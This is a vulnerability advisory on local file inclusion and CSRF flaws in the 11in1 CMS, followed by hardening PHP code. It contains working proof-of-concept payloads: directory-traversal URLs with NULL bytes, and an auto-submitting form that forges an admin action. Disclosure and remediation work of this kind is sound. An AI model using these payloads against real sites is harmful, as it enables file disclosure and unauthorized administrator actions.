High-Tech Bridge advisory HTB23071
Multiple vulnerabilities in 11in1
Published: 2012-01-25
Source: High-Tech Bridge, www.htbridge.com

CVSS2 score: 6.8 (Medium)
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

EPSS: 0.01 (Low), percentile 82.3%

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in 11in1, which can be exploited to perform Local File Inclusion and Cross-Site Request Forgery (CSRF) attacks.

  1. Local File Inclusion in 11in1: CVE-2012-0996
    Input passed via the "class" GET parameter to index.php and /admin/index.php is not properly verified before being used to include local files.
    This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.
    The following PoC (Proof of Concept) demonstrates the vulnerability:
    http://[host]/index.php?class=../../../tmp/file%00
    http://[host]/admin/index.php?class=../../../tmp/file%00
    Successful exploitation of the vulnerabilities requires that "magic_quotes_gpc" is off.

  2. Cross-Site Request Forgery (CSRF) in 11in1: CVE-2012-0997
    The application allows authorized users to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests.
    To exploit this vulnerability, an attacker must make a logged-in administrator open a malicious link in the browser.
    The following PoC will create a new topic on behalf of the website administrator:
    <form action="http://[host]/admin/index.php?class=do&action=addTopic" method="post">
    <input type="hidden" name="name" value="New Topic Name here">
    <input type="hidden" name="sec" value="3">
    <input type="hidden" name="content" value="New Topic Content here">
    <input type="submit" id="btn">
    </form>
    <script>
    document.getElementById('btn').click();
    </script>
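How both findings are closed on the application side, as an added PHP example that is not 11in1's own code: the "class" parameter is resolved through an identifier check, an allowlist and a realpath check instead of being passed to include, and every admin POST must carry a per-session CSRF token. The module directory and the allowlist entries other than "do" are assumptions.

```php
<?php
// Added example: hardened dispatcher for a PHP app such as 11in1 (not the project's own code).
// Assumptions: modules live in ./classes/<name>.php; of the allowlist below only "do" is
// named in the advisory, "home" and "topic" are hypothetical.
declare(strict_types=1);
const CLASS_DIR = __DIR__ . '/classes';
const ALLOWED_CLASSES = ['home', 'topic', 'do'];
// Map the "class" request parameter to a file, or return null for anything unsafe.
function resolveClassFile(string $class): ?string
{
    // A strict identifier pattern rejects "../", NUL bytes and any other path syntax.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $class)) {
        return null;
    }
    // Only known modules may be included, whatever else exists on disk.
    if (!in_array($class, ALLOWED_CLASSES, true)) {
        return null;
    }
    $path = realpath(CLASS_DIR . '/' . $class . '.php');
    // realpath() is false for missing files and resolves symlinks; the module must sit in CLASS_DIR.
    if ($path === false || dirname($path) !== realpath(CLASS_DIR)) {
        return null;
    }
    return $path;
}

// Reject state-changing admin requests that lack the per-session CSRF token.
function requireCsrfToken(): void
{
    if (empty($_SESSION['csrf_token'])) {
        // Emit this value as a hidden field in every admin form.
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $sent = (string) ($_POST['csrf_token'] ?? '');
        if (!hash_equals($_SESSION['csrf_token'], $sent)) {
            http_response_code(403);
            exit('Invalid CSRF token');
        }
    }
}

session_start();
requireCsrfToken();
$file = resolveClassFile((string) ($_GET['class'] ?? 'home'));
if ($file === null) {
    http_response_code(404);
    exit('Unknown class');
}
require $file;
```

The magic_quotes_gpc setting that the advisory names as the precondition is not a fix: it only backslash-escapes the NULL byte, and it was removed in PHP 5.4.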

Affected product (CPE): 11in1, version le (<=) 1.2.1
